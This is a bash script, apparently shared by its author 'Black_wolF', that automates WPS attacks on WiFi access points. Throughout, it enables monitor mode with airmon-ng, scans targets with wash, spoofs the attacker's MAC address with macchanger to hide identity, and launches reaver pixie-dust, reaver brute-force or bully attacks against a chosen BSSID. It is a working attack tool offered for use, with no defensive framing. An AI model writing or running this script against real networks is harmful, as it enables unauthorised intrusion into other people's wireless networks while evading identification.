#!/usr/bin/bash
trap bashtrap INT
clear
startdate=$(date)
printf "    \n\n\n     "
echo $startdate
printf "    \n\n\n"
printf "    w         w    pppp     sssss  \n"
printf "    w         w    p   p   s\n"
printf "    w         w    p   p   s\n"
printf "    w    w    w    pppp     ssss \n"
printf "    w   w w   w    p            s\n"
printf "     w w   w w     p            s\n"
printf "      w     w      p       sssss   ATTACK \n"
printf "    "
printf "    "
printf "    "
printf "\n\n    WPS Attack by Black_wolF\n\n "
sleep 1
clear
cat wolf
sleep 1
clear
ifconfig
echo "Chose WiFi card (etc. wlan0) :"
read wln
airmon-ng start $wln
airmon-ng start $wln
sleep 1
printf "\nPress enter to continue..."
read sss
net=$wln'mon'
ifconfig
echo "Chose WiFi card in monitor mode(etc. wlan0mon) :"
#read net



printf "\n Wifi card is set on monitor mod $net!!!\n"
sleep 1

clear
echo "Press CTRL+C to stop wash and continue..."
wash -i $net
bashtrap()
{
	printf "\nCTRL+C Detected ... Press Enter to continue or CTRL+Z to exit"
	#echo "Close Script"
}
printf "\n\nTargets MAC address (bssid) : "
read bssid
printf "\nTargets wifi channel : "
read channel

clear
ifconfig $net down
macchanger -r $net
ifconfig $net up
printf "\n\nMAC Address changed on $net!!!\n"
printf "\n\nYou are ready to attack $bssid on chanel $channel with wifi $wlan set on monitor mod ($net) !!!\n"
sleep 2
clear

printf  "\n\nChose the type of WPS Attack"
printf  "\n1. reaver"
printf  "\n2. bully\n"
read attack

if [ $attack -eq 1 ] ; then
	clear	
	printf  "\nYou chose reaver attack \n"
	printf  "\n1. For reaver pixie dust attack \n"
	printf  "\n2. For reaver brute force attack \n"
	read rvr
	if [ $rvr -eq 1 ] ; then 	
		printf  "\nYou chose reaver pixie dust attack \n"
		printf  "\nThe command i will run for you is : \n"
		printf  "\nreaver -i $net -b $bssid -c $channel -vv -K 1\n"
		sleep 2
		reaver -i $net -b $bssid -c $channel -vv -K 1
	else
		if [ $rvr -eq 2 ] ; then 
			printf  "\nYou chose reaver brute force attack \n"
			reaver -i $net -b $bssid -c $channel -vv 
		fi
	fi


else
	if [ $attack -eq 2  ] ; then
		clear
		printf  "\nYou chose bully attack \n"
		bully -b $bssid -c $channel -L -a 3 $net
	fi
fi
airmon-ng stop $wln
airmon-ng stop $net
#ifconfig $wln up
#ifconfig
enddate=$(date)

cat wolf
printf "\n\nWPS-attack Start at $startdate \nWPS-attack End at   $enddate\n"
printf "\n\nGood bye...\n\n"
